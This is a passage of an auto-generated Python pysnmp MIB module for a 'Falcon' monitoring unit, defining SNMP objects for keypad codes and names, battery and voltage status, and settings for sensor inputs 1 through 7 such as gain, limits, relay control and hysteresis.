falconKeypadCode12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 23), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode12.setStatus('mandatory')
falconKeypadName12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 24), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName12.setStatus('mandatory')
falconKeypadCode13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 25), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode13.setStatus('mandatory')
falconKeypadName13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 26), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName13.setStatus('mandatory')
falconKeypadCode14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 27), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode14.setStatus('mandatory')
falconKeypadName14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 28), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName14.setStatus('mandatory')
falconKeypadCode15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 29), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode15.setStatus('mandatory')
falconKeypadName15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 30), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName15.setStatus('mandatory')
falconKeypadCode16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 31), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode16.setStatus('mandatory')
falconKeypadName16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 32), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName16.setStatus('mandatory')
falconKeypadCode17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 33), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode17.setStatus('mandatory')
falconKeypadName17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 34), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName17.setStatus('mandatory')
falconKeypadCode18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 35), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode18.setStatus('mandatory')
falconKeypadName18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 36), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName18.setStatus('mandatory')
falconKeypadCode19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 37), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode19.setStatus('mandatory')
falconKeypadName19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 38), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName19.setStatus('mandatory')
falconKeypadCode20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 39), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode20.setStatus('mandatory')
falconKeypadName20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 40), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName20.setStatus('mandatory')
falconInputVoltage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInputVoltage.setStatus('mandatory')
falconOnBattery = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("notInstalled", 0), ("installed", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconOnBattery.setStatus('mandatory')
falconLowBatteryThreshold = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconLowBatteryThreshold.setStatus('mandatory')
falconAnalogAverage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 60))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAnalogAverage.setStatus('mandatory')
falconInputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3))
falconInput1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1))
falconInput1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1State.setStatus('mandatory')
falconInput1Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput1Reading.setStatus('mandatory')
falconInput1Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Gain.setStatus('mandatory')
falconInput1Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Offset.setStatus('mandatory')
falconInput1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Label.setStatus('mandatory')
falconInput1UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1UOM.setStatus('mandatory')
falconInput1HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit2.setStatus('mandatory')
falconInput1HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit.setStatus('mandatory')
falconInput1LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit.setStatus('mandatory')
falconInput1LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit2.setStatus('mandatory')
falconInput1RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1RlyControl.setStatus('mandatory')
falconInput1Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Delay.setStatus('mandatory')
falconInput1Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Hysteresis.setStatus('mandatory')
falconInput2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2))
falconInput2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2State.setStatus('mandatory')
falconInput2Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput2Reading.setStatus('mandatory')
falconInput2Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Gain.setStatus('mandatory')
falconInput2Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Offset.setStatus('mandatory')
falconInput2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Label.setStatus('mandatory')
falconInput2UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2UOM.setStatus('mandatory')
falconInput2HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit2.setStatus('mandatory')
falconInput2HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit.setStatus('mandatory')
falconInput2LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit.setStatus('mandatory')
falconInput2LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit2.setStatus('mandatory')
falconInput2RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2RlyControl.setStatus('mandatory')
falconInput2Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Delay.setStatus('mandatory')
falconInput2Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Hysteresis.setStatus('mandatory')
falconInput3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3))
falconInput3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3State.setStatus('mandatory')
falconInput3Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput3Reading.setStatus('mandatory')
falconInput3Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Gain.setStatus('mandatory')
falconInput3Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Offset.setStatus('mandatory')
falconInput3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Label.setStatus('mandatory')
falconInput3UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3UOM.setStatus('mandatory')
falconInput3HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit2.setStatus('mandatory')
falconInput3HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit.setStatus('mandatory')
falconInput3LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit.setStatus('mandatory')
falconInput3LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit2.setStatus('mandatory')
falconInput3RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3RlyControl.setStatus('mandatory')
falconInput3Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Delay.setStatus('mandatory')
falconInput3Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Hysteresis.setStatus('mandatory')
falconInput4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4))
falconInput4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4State.setStatus('mandatory')
falconInput4Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput4Reading.setStatus('mandatory')
falconInput4Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Gain.setStatus('mandatory')
falconInput4Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Offset.setStatus('mandatory')
falconInput4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Label.setStatus('mandatory')
falconInput4UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4UOM.setStatus('mandatory')
falconInput4HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit2.setStatus('mandatory')
falconInput4HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit.setStatus('mandatory')
falconInput4LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit.setStatus('mandatory')
falconInput4LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit2.setStatus('mandatory')
falconInput4RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4RlyControl.setStatus('mandatory')
falconInput4Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Delay.setStatus('mandatory')
falconInput4Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Hysteresis.setStatus('mandatory')
falconInput5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5))
falconInput5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5State.setStatus('mandatory')
falconInput5Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput5Reading.setStatus('mandatory')
falconInput5Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Gain.setStatus('mandatory')
falconInput5Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Offset.setStatus('mandatory')
falconInput5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Label.setStatus('mandatory')
falconInput5UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5UOM.setStatus('mandatory')
falconInput5HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit2.setStatus('mandatory')
falconInput5HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit.setStatus('mandatory')
falconInput5LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit.setStatus('mandatory')
falconInput5LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit2.setStatus('mandatory')
falconInput5RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5RlyControl.setStatus('mandatory')
falconInput5Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Delay.setStatus('mandatory')
falconInput5Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Hysteresis.setStatus('mandatory')
falconInput6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6))
falconInput6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6State.setStatus('mandatory')
falconInput6Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput6Reading.setStatus('mandatory')
falconInput6Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Gain.setStatus('mandatory')
falconInput6Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Offset.setStatus('mandatory')
falconInput6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Label.setStatus('mandatory')
falconInput6UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6UOM.setStatus('mandatory')
falconInput6HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit2.setStatus('mandatory')
falconInput6HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit.setStatus('mandatory')
falconInput6LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit.setStatus('mandatory')
falconInput6LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit2.setStatus('mandatory')
falconInput6RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6RlyControl.setStatus('mandatory')
falconInput6Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Delay.setStatus('mandatory')
falconInput6Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Hysteresis.setStatus('mandatory')
falconInput7 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7))
falconInput7State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7State.setStatus('mandatory')
falconInput7Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput7Reading.setStatus('mandatory')
falconInput7Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Gain.setStatus('mandatory')
falconInput7Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Offset.setStatus('mandatory')
